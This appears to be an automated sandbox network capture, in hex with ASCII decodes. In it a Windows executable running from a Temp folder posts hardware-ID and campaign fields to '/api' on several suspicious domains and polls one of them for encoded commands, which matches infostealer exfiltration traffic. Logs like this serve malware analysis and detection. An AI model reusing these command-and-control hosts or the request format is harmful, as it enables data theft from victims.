                                                                                                                                                                                                                                                              2024-12-22 01:18:55 UTC293INData Raw: 31 31 65 0d 0a 5f 70 6c 61 63 65 68 6f 6c 64 65 72 5f 6c 61 62 65 6c 22 3a 5b 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 30 22 2c 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 31 22 2c 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 32 22 5d 2c 22 6d 65 6e 75 5f 70 6c 61 63 65 68 6f 6c 64 65 72 5f 6c 61 62 65 6c 22 3a 22 6d 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 32 36 35 2c 33 37 30 31 33 38 34 2c 31 30 32 32 37 38 32 30 35 2c 31 30 32 32 37 38 32 31 31 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a
                                                                                                                                                                                                                                                              Data Ascii: 11e_placeholder_label":["left_product_control-label0","left_product_control-label1","left_product_control-label2"],"menu_placeholder_label":"menu-content","metadata":{"bar_height":60,"experiment_id":[3700265,3701384,102278205,102278211],"is_backup_bar":
                                                                                                                                                                                                                                                              2024-12-22 01:18:55 UTC1390INData Raw: 38 30 30 30 0d 0a 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 5c 75 30 30 33 64 74 68 69 73 3b 5c 6e 74 72 79 7b 5c 6e 5f 2e 78 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 21 61 2e 6a 29 69 66 28 63 20 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 29 66 6f 72 28 76 61 72 20 64 20 6f 66 20 63 29 5f 2e 78 64 28 61 2c 62 2c 64 29 3b 65 6c 73 65 7b 64 5c 75 30 30 33 64 28 30 2c 5f 2e 7a 29 28 61 2e 43 2c 61 2c 62 29 3b
                                                                                                                                                                                                                                                              Data Ascii: 8000pt":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_||{};(function(_){var window\u003dthis;\ntry{\n_.xd\u003dfunction(a,b,c){if(!a.j)if(c instanceof Array)for(var d of c)_.xd(a,b,d);else{d\u003d(0,_.z)(a.C,a,b);
                                                                                                                                                                                                                                                              2024-12-22 01:18:55 UTC1390INData Raw: 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 48 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 49 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 7d 7d 3b 5f 2e 4a 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 49 64 28 5c 22 61 62 6f 75 74 3a 69 6e 76 61 6c 69 64 23 7a 43 6c 6f 73 75 72 65 7a 5c 22 29 3b 5f 2e 46 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 6e 68 5c 75 30 30 33 64 61 7d
                                                                                                                                                                                                                                                              Data Ascii: 0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Hd\u003dglobalThis.trustedTypes;_.Id\u003dclass{constructor(a){this.i\u003da}toString(){return this.i}};_.Jd\u003dnew _.Id(\"about:invalid#zClosurez\");_.Fd\u003dclass{constructor(a){this.nh\u003da}
                                                                                                                                                                                                                                                              2024-12-22 01:18:55 UTC1390INData Raw: 5c 75 30 30 33 64 61 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 65 6c 73 65 20 61 5c 75 30 30 33 64 5f 2e 58 64 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 5a 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 29 7b 6c 65 74 20 63 2c 64 3b 62 5c 75 30 30 33 64 28 64 5c 75 30 30 33 64 28 63 5c 75 30 30 33 64 5c 22 64 6f 63 75 6d 65 6e 74 5c 22 69 6e 20 62 3f 62 2e 64 6f 63 75 6d 65 6e 74 3a 62 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 29 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 64 2e 63 61 6c 6c 28 63 2c 60 24 7b 61 7d 5b 6e 6f 6e 63 65 5d 60 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 5c 22 5c 22
                                                                                                                                                                                                                                                              Data Ascii: \u003da.i;else throw Error(\"F\");else a\u003d_.Xd(a);return a};_.Zd\u003dfunction(a,b\u003ddocument){let c,d;b\u003d(d\u003d(c\u003d\"document\"in b?b.document:b).querySelector)\u003d\u003dnull?void 0:d.call(c,`${a}[nonce]`);return b\u003d\u003dnull?\"\"
                                                                                                                                                                                                                                                              2024-12-22 01:18:55 UTC1390INData Raw: 72 65 74 75 72 6e 20 61 7c 7c 6e 75 6c 6c 7d 3b 5c 6e 5f 2e 6b 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 79 62 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 79 6c 65 5c 22 3f 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 63 6c 61 73 73 5c 22 3f 61 2e 63 6c 61 73 73 4e 61 6d 65 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 66 6f 72 5c 22 3f 61 2e 68 74 6d 6c 46 6f 72 5c 75 30 30 33 64 63 3a 6a 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 64 29 3f 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 6a 65 5b 64 5d 2c 63 29 3a 5f 2e 65 65 28 64 2c 5c 22 61 72 69 61 2d 5c 22 29 7c 7c 5f 2e
                                                                                                                                                                                                                                                              Data Ascii: return a||null};\n_.ke\u003dfunction(a,b){_.yb(b,function(c,d){d\u003d\u003d\"style\"?a.style.cssText\u003dc:d\u003d\u003d\"class\"?a.className\u003dc:d\u003d\u003d\"for\"?a.htmlFor\u003dc:je.hasOwnProperty(d)?a.setAttribute(je[d],c):_.ee(d,\"aria-\")||_.


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              51192.168.2.450235172.217.19.228443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:18:54 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.google.com
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                              2024-12-22 01:18:55 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Version: 705503573
                                                                                                                                                                                                                                                              Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                              Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                              Permissions-Policy: unload=()
                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:55 GMT
                                                                                                                                                                                                                                                              Server: gws
                                                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                              Accept-Ranges: none
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              2024-12-22 01:18:55 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                              2024-12-22 01:18:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              52192.168.2.450242104.21.89.1154437796C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:18:55 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=AJV3B5NXXK1X4OPR04
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 18158
                                                                                                                                                                                                                                                              Host: fieldhitty.click
                                                                                                                                                                                                                                                              2024-12-22 01:18:55 UTC15331OUTData Raw: 2d 2d 41 4a 56 33 42 35 4e 58 58 4b 31 58 34 4f 50 52 30 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 41 4a 56 33 42 35 4e 58 58 4b 31 58 34 4f 50 52 30 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 41 4a 56 33 42 35 4e 58 58 4b 31 58 34 4f 50 52 30 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 76 62 41 72 5a 2d 2d 0d 0a 2d 2d 41
                                                                                                                                                                                                                                                              Data Ascii: --AJV3B5NXXK1X4OPR04Content-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--AJV3B5NXXK1X4OPR04Content-Disposition: form-data; name="pid"2--AJV3B5NXXK1X4OPR04Content-Disposition: form-data; name="lid"PvbArZ----A
                                                                                                                                                                                                                                                              2024-12-22 01:18:55 UTC2827OUTData Raw: 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af
                                                                                                                                                                                                                                                              Data Ascii: 5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6
                                                                                                                                                                                                                                                              2024-12-22 01:18:56 UTC1134INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:56 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=qnufls9jm85c55o3cqmkdm4k8p; expires=Wed, 16 Apr 2025 19:05:34 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d%2F7f4kCGVb4ijjeQ71JSHQBmUPiOMhWBOHDcP9GQwB2BvbPX8ILsTeSlCarlA6LgZy%2BDWsKWWoeWOUq%2BzIF%2FkqpYh8%2BJIDmML8%2BDkKvogH8%2BqlGF4wvu0kSlUuWUuhklYt3u"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c47dc68987d14-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1801&min_rtt=1774&rtt_var=720&sent=19&recv=22&lost=0&retrans=0&sent_bytes=2838&recv_bytes=19120&delivery_rate=1465127&cwnd=245&unsent_bytes=0&cid=e1396eff345e5b18&ts=1073&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:18:56 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2024-12-22 01:18:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              53192.168.2.450246104.21.21.99443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:18:56 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=31HC62KAM5E5A
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 20407
                                                                                                                                                                                                                                                              Host: discokeyus.lat
                                                                                                                                                                                                                                                              2024-12-22 01:18:56 UTC15331OUTData Raw: 2d 2d 33 31 48 43 36 32 4b 41 4d 35 45 35 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 33 31 48 43 36 32 4b 41 4d 35 45 35 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 33 31 48 43 36 32 4b 41 4d 35 45 35 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 33 31 48 43 36 32 4b 41 4d 35 45
                                                                                                                                                                                                                                                              Data Ascii: --31HC62KAM5E5AContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--31HC62KAM5E5AContent-Disposition: form-data; name="pid"3--31HC62KAM5E5AContent-Disposition: form-data; name="lid"PsFKDg--pablo--31HC62KAM5E
                                                                                                                                                                                                                                                              2024-12-22 01:18:56 UTC5076OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii: lrQMn 64F6(X&7~`aO
                                                                                                                                                                                                                                                              2024-12-22 01:18:57 UTC1130INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:57 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=r3e8bj05kcg91nstppga3g83ev; expires=Wed, 16 Apr 2025 19:05:36 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sRAXG%2Fm3aFYpzf7hPI2PR3wn0YJneSfHyHboW1sjDX2ibq5iuuPxEMvkL1KavKTI%2FiDfg2pncLQDPcZKVNxxeLyh7BJhCzC4f2Vp1oW%2FplGjJfD9xlVouYimkwOPrYliBg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c47e43dedc411-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1609&min_rtt=1597&rtt_var=624&sent=13&recv=25&lost=0&retrans=0&sent_bytes=2832&recv_bytes=21362&delivery_rate=1720683&cwnd=224&unsent_bytes=0&cid=f29c49ecce9051e7&ts=1012&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:18:57 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2024-12-22 01:18:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              54192.168.2.450247104.21.67.146443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:18:56 UTC355OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Cookie: __cf_mw_byp=IjjBQ74NQR3Cy3LPi8f7NG.yiYgwJYrvuAxBctfN9tI-1734830334-0.0.1.1-/api
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 50
                                                                                                                                                                                                                                                              Host: cheapptaxysu.click
                                                                                                                                                                                                                                                              2024-12-22 01:18:56 UTC50OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 43 5a 4a 76 73 73 2d 2d 67 65 6f 70 6f 78 69 64 26 6a 3d
                                                                                                                                                                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=CZJvss--geopoxid&j=
                                                                                                                                                                                                                                                              2024-12-22 01:18:57 UTC1134INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:57 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=4qo7tv5gkrnc8dm58r8qljn8gl; expires=Wed, 16 Apr 2025 19:05:36 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=49L%2BIPnHiOr2rUIVuSHHPGqYR7VOmUSU5x%2BJWLDP%2FpsOXdUuzqm%2Fmqmjjd1NPeP7qMyzFPZGwG1eBX78SIANp13NyeBUSSvteop8bWu3eiRNKl4YB%2FS5mUnoAJEwnMM5NgdY%2B9Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c47e51a75de92-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1489&min_rtt=1489&rtt_var=559&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1041&delivery_rate=1954484&cwnd=245&unsent_bytes=0&cid=2e63359e3c3782e9&ts=771&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:18:57 UTC235INData Raw: 32 64 32 66 0d 0a 57 41 6c 54 5a 33 2f 74 61 69 70 49 78 69 58 43 6f 42 48 56 4a 61 52 7a 39 64 6b 74 6f 6f 78 49 72 34 68 6f 6c 48 4e 61 78 32 59 6a 4b 79 56 46 52 64 6c 47 43 44 75 6a 42 2f 6a 55 59 36 42 41 69 46 47 55 76 51 2b 59 36 69 6e 44 2b 77 32 34 55 53 79 71 52 47 4a 76 4d 67 73 4d 69 45 59 49 4c 62 34 48 2b 50 74 71 39 30 44 4b 55 63 2f 37 53 4d 6a 75 4b 63 50 71 43 66 38 63 4b 71 73 46 4d 47 55 30 44 78 71 4f 44 6b 73 6b 71 30 43 6e 78 58 43 2f 53 38 30 65 6e 62 51 50 6a 71 34 74 31 61 70 53 74 6a 34 2f 73 77 63 56 61 43 41 4d 58 5a 42 47 55 57 71 6a 53 2b 43 61 4d 37 52 41 78 68 2b 54 76 55 62 4b 35 43 44 4c 36 77 7a 2b 41 7a 4f 68 44 6a 42 72 4e 77 34 51 68 78 70 47 4c 71 78 4c 6f
                                                                                                                                                                                                                                                              Data Ascii: 2d2fWAlTZ3/taipIxiXCoBHVJaRz9dktooxIr4holHNax2YjKyVFRdlGCDujB/jUY6BAiFGUvQ+Y6inD+w24USyqRGJvMgsMiEYILb4H+Ptq90DKUc/7SMjuKcPqCf8cKqsFMGU0DxqODkskq0CnxXC/S80enbQPjq4t1apStj4/swcVaCAMXZBGUWqjS+CaM7RAxh+TvUbK5CDL6wz+AzOhDjBrNw4QhxpGLqxLo
